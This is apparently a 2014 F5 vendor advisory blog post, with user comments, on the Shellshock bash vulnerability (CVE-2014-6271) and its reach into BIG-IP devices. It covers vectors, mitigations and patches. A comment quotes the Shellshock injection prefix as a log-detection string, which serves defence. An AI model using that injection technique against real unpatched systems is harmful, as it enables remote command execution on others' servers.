CVE-2014-6271 Shellshocked

It's a good thing we are naming all of our vulnerabilities now; it's easier to keep track of them. I haven't seen an official designation for CVE-2014-6271, but Shellshock seems appropriate.

This new vulnerability may allow a remote attacker to execute instructions on your computer using a feature of the bash shell. A shell is a command line user interface with complicated features akin to programming languages. One feature of bash is to take user input from its environment. Unfortunately this environment can contain executable commands and in some cases can be manipulated by a remote user.

F5 has confirmed that BIG-IP's web GUI is vulnerable to an authenticated user. We currently know of no unauthenticated exploits, either against the management interface or against the traffic interfaces.

We can enumerate through RedHat's security blog's list -- not a comprehensive list -- to look at some ways a BIG-IP could be exploited.
    •    BIG-IP does not use ForceCommand in sshd_config, so users cannot bypass ForceCommand.
    •    BIG-IP does not contain any bash CGI programs, although it is possible that some CGI programs spawn subshells.
    •    BIG-IP does contain mod_php, but the scripts are not vulnerable.
    •    BIG-IP does contain DHCP dhclient and is in theory vulnerable to a malicious DHCP server. This is the only known unauthenticated remotely exploitable vector at this time and is only vulnerable on the management interface. You may disable DHCP on the System::Platform page.
    •    BIG-IP limits the use of bash to authenticated Administrator level accounts. Non-Administrators only have access to tmsh and do not have access to bash.

We still do not believe the traffic passing interfaces of a BIG-IP can be exploited. Please protect your management interface and ensure that it is not exposed to the internet.

F5 will be patching CVE-2014-6271 on all BIG-IP releases. Sol15629 has been published.

Update: BIG-IP iRule mitigation has been posted. F5 LineRate has posted their mitigation. ASM has signature updates.

Published Sep 25, 2014
Version 1.0
security
shellshock
TMOS
  • daniel_spillers's avatar
    daniel_spillers
    Icon for Nimbostratus rankNimbostratus
    Sep 25, 2014
    "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." Do you mean that traffic passing interfaces can't be used to attack the BIG-IP appliance itself? Or do you mean the traffic passing interfaces won't pass attacks to back-end servers?
  • Emad's avatar
    Emad
    Icon for Cirrostratus rankCirrostratus
    Sep 25, 2014
    And What about ASM? Is F5 Planning to release any signature for it.?
  • John_Alam_45640's avatar
    John_Alam_45640
    Historic F5 Account
    Sep 25, 2014
    Daniel: This article refers to the security of the BigIP platform itself. The F5 ASM can block such attacks on backend applications when the proper signature is available. This signature can come from F5 or can be user specified. Another option is an iRule. Check this iRule: https://devcentral.f5.com/s/feed/0D51T00006j49ZqSAI
  • Simon_Waters_13's avatar
    Simon_Waters_13
    Icon for Cirrostratus rankCirrostratus
    Sep 25, 2014
    Can you confirm the User-Agent injection in the management interface? https://twitter.com/ashk4n/status/515121090688196609
  • Jeff_Costlow_10's avatar
    Jeff_Costlow_10
    Historic F5 Account
    Sep 25, 2014
    We can confirm that the management GUI is vulnerable to an authenticated user. We will be patching this issue as soon as possible. "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." The attack will be passed to back end severs. We do not believe that the attack could exploit a BIG-IP directly through the traffic interfaces.
  • pmilot's avatar
    pmilot
    Icon for Altostratus rankAltostratus
    Sep 25, 2014
    Jeff, You say "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited."; Does this apply to the APM module as well given that those provide web services and serve web content through it's service interface ?
  • Simon_Waters_13's avatar
    Simon_Waters_13
    Icon for Cirrostratus rankCirrostratus
    Sep 25, 2014
    Thanks. In the twitter link they claim that apache is in shadow group, this is not apparently the case on my F5 device. Can you provide clarity there too? Are these permissions some devices, all devices, is it revealed in /etc/group or somewhere else? Not that I want them running commands as apache, but I want to understand fully what I'm reading. Happy to take it to support ticket (already open) if you don't want to discuss here.
  • Sam_Pickles_110's avatar
    Sam_Pickles_110
    Icon for Nimbostratus rankNimbostratus
    Sep 25, 2014
    Johny, a custom signature may be used in ASM to block Shellshock: https://auraredeye.zendesk.com/entries/56168065-Shellshock-CVE-2014-6271-Mitigation-Custom-ASM-signature This has been working well for us in production so far; we've blocked a lot of attempts particularly over the past 24 hours.
  • Network_Operat2's avatar
    Network_Operat2
    Icon for Nimbostratus rankNimbostratus
    Sep 26, 2014
    1) What about APM, used to check user certificates before passing the traffic on? That process is hosted by the F5 directly, and is exposed to anonymous users. 2) To all: ... check your www logs for this string: () { - saw lots of attempts to install wow1 last night. If your F5 hosted server is at Bash enabled and unpatched... it may be already owned.